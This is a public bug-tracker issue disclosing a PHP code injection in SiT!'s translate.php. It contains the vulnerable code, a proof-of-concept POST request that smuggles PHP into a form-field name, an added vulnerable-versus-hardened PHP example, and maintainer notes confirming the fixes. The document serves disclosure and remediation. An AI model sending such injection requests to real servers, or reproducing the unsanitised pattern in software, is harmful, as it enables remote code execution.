SiT! Bugs

View Issue Details

ID: 0001737
Project: SiT!
Category: security
View Status: public
Date Submitted: 2011-11-13 19:16
Last Update: 2012-07-07 18:10
Reporter: EgiX
Assigned To: ivan
Priority: urgent
Severity: major
Reproducibility: always
Status: closed
Resolution: fixed
Platform / OS / OS Version: (not set)
Product Version: (not set)
Target Version: 3.66 LTS
Fixed in Version: 3.66 LTS
Summary: 0001737: PHP Code Injection Vulnerability
Description:

Hi,
I found a critical security vulnerability that could allow malicious users to execute arbitrary PHP code.
The vulnerable code is located in 'translate.php':

234. foreach (array_keys($_POST) as $key)
235. {
236. if (!empty($_POST[$key]) AND substr($key, 0, 3) == "str")
237. {
238. if ($lastchar!='' AND substr($key, 3, 1) != $lastchar) $i18nfile .= "\n";
239. $i18nfile .= "\${$key} = '".addslashes($_POST[$key])."';\n";
240. $lastchar = substr($key, 3, 1);
241. $translatedcount++;
242. }
243. }
244. $percent = number_format($translatedcount / $origcount * 100,2);
245.
246. $i18nfile .= "?>\n";
247.
248. // CJ 02 Jun 11 - Unfortunately mailto has a restriction for attaching body text, so we cannot do that here
249. echo "
".sprintf($strSendTranslation, "<code>{$filename}</code>", "<code>".APPLICATION_I18NPATH."</code>", "<a href='mailto:sit-translators@lists.sitracker.org?subject={$lang} translation&body={$percent} Percent Complete %0A%0A'>sitracker-devel-discuss@lists.sourceforge.net</a>")."
";
250. echo "
{$strTranslation}: {$translatedcount}/{$origcount} = {$percent}% {$strComplete}.
";
251.
252. $myFile = APPLICATION_I18NPATH."{$filename}";
253. $fp = @fopen($myFile, 'w');
254. if (!$fp)
255. {
256. echo "<p class='warning'>".sprintf($strCannotWriteFile, "<code>{$myFile}</code>")."
";
257. }
258. else
259. {
260. fwrite($fp, $i18nfile);
261. fclose($fp);

An attacker could inject arbitrary PHP code into the $i18nfile variable because at line 239 the $key variable isn't properly sanitized.

For example he could send this POST request:

POST /sit-3.65/translate.php HTTP/1.0
Host: 127.0.0.1
Cookie: SiTsessionID=b7iiuibskjf07unogbnrnegka6
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
Connection: close

mode=save&lang=sh&str;phpinfo();//=1

After processing this request, a new file (/sit-3.65/i18n/sh.inc.php) will be created with this content:

<?php

$languagestring = ' (sh)';
$i18ncharset = 'UTF-8';

// list of strings (Alphabetical by key)
$str;phpinfo();// = '1';
?>

Furthermore, accessing for example http://127.0.0.1/sit-3.65/translate.php?mode=save directly will reveal the full installation path of the application.

Regards!
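As an added example that is neither part of the report above nor SiT!'s own code: the generator pattern from translate.php reproduced on a constructed $_POST array, next to a hardened variant. The key is the injection point, since the raw POST key becomes a PHP variable name while only the value passes through addslashes(). The hardened function (this example's approach, not necessarily what SVN r7430 did) accepts a key only if it matches an anchored identifier regex and emits the value with var_export(). All function names, the $post array and the $rejected list are this example's own.

```php
<?php
// Added example, not code from SiT! or from the report. Reproduces the
// translate.php generator on a constructed $_POST and shows a hardened form.
// Requires PHP 7.1+ (array destructuring with [ ] on assignment).

// Vulnerable pattern: the POST *key* is interpolated into the generated source
// as a variable name with no check; only the value goes through addslashes().
function build_i18n_vulnerable(array $post): string
{
    $i18nfile = "<?php\n\n// list of strings (Alphabetical by key)\n";
    $lastchar = '';
    foreach (array_keys($post) as $key) {
        if (!empty($post[$key]) && substr($key, 0, 3) == 'str') {
            if ($lastchar != '' && substr($key, 3, 1) != $lastchar) {
                $i18nfile .= "\n";
            }
            // "\${$key}" yields a literal "$" followed by the raw key text,
            // so a key such as "str;phpinfo();//" becomes executable code.
            $i18nfile .= "\${$key} = '" . addslashes($post[$key]) . "';\n";
            $lastchar = substr($key, 3, 1);
        }
    }
    return $i18nfile . "?>\n";
}

// Hardened pattern (this example's approach):
//  1. accept a key only if it is a valid PHP identifier of the expected shape,
//     checked with an anchored regex; anything else is refused and reported;
//  2. emit the value with var_export(), which always produces a correctly
//     quoted PHP string literal (addslashes() is a SQL-era helper; e.g. a NUL
//     byte becomes the two characters "\0" inside single quotes).
// Returns [generated source, refused keys] so the caller can log refusals
// instead of silently dropping an attempted injection.
function build_i18n_hardened(array $post): array
{
    $i18nfile = "<?php\n\n// list of strings (Alphabetical by key)\n";
    $lastchar = '';
    $rejected = [];
    foreach ($post as $key => $value) {
        $key = (string) $key;
        if (!is_string($value) || $value === '' || substr($key, 0, 3) !== 'str') {
            continue;
        }
        if (!preg_match('/\Astr[A-Za-z0-9_]{1,128}\z/', $key)) {
            $rejected[] = $key;
            continue;
        }
        // The regex guarantees at least one character after "str".
        if ($lastchar !== '' && $key[3] !== $lastchar) {
            $i18nfile .= "\n";
        }
        $i18nfile .= '$' . $key . ' = ' . var_export($value, true) . ";\n";
        $lastchar = $key[3];
    }
    return [$i18nfile . "?>\n", $rejected];
}

// Constructed input mirroring the request in the report, plus a benign string
// containing quotes to show that values are still handled correctly.
$post = [
    'mode'             => 'save',
    'lang'             => 'sh',
    'str;phpinfo();//' => '1',
    'strHello'         => "it's a 'test'",
];

echo "--- vulnerable generator ---\n", build_i18n_vulnerable($post);
[$safe, $rejected] = build_i18n_hardened($post);
echo "--- hardened generator ---\n", $safe;
echo "rejected keys: ", json_encode($rejected), "\n";
```

Running it prints the two generated files side by side: the vulnerable one carries the attacker's key verbatim as a statement, while the hardened one contains only the strHello assignment and lists the refused key. A generated file is source code, so a useful extra guard before writing it to APPLICATION_I18NPATH is to lint it (php -l on a temporary copy) and refuse to deploy anything the engine will not parse.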
Notes

Note 0004335: paulh (administrator), 2011-11-13 19:57

Hi EgiX, thanks for the report, this code injection is fixed in the current SVN trunk (r7430 cleaned this variable).

The second issue with revealing the full installation path is still present and I agree we should just show the relative part.

I'm not sure when we're planning to release 3.66 though I'm sure ericthefish will be along shortly.
Note 0004476: ivan (administrator), 2012-05-05 15:52

svn r7508 removes the display of the full path, we now only show the relative part. - thanks for the bug report.

Issue History

Date Modified | Username | Field | Change
2011-11-13 19:16 EgiX New Issue
2011-11-13 19:16 EgiX Status new => assigned
2011-11-13 19:16 EgiX Assigned To => ivan
2011-11-13 19:57 paulh Note Added: 0004335
2012-03-26 03:54 anonymous Note Added: 0004468
2012-03-26 03:54 anonymous Status assigned => feedback
2012-03-26 03:55 anonymous Note Deleted: 0004468
2012-05-05 15:21 ivan Status feedback => confirmed
2012-05-05 15:21 ivan Target Version => 3.66 LTS
2012-05-05 15:28 ivan Status confirmed => assigned
2012-05-05 15:52 ivan Note Added: 0004476
2012-05-05 15:52 ivan Status assigned => resolved
2012-05-05 15:52 ivan Fixed in Version => Current SVN
2012-05-05 15:52 ivan Resolution open => fixed
2012-07-06 14:13 Tomse Fixed in Version Current SVN => 3.66 LTS
2012-07-07 18:10 ivan Status resolved => closed


Copyright © 2000 - 2014 MantisBT Team
Powered by Mantis Bugtracker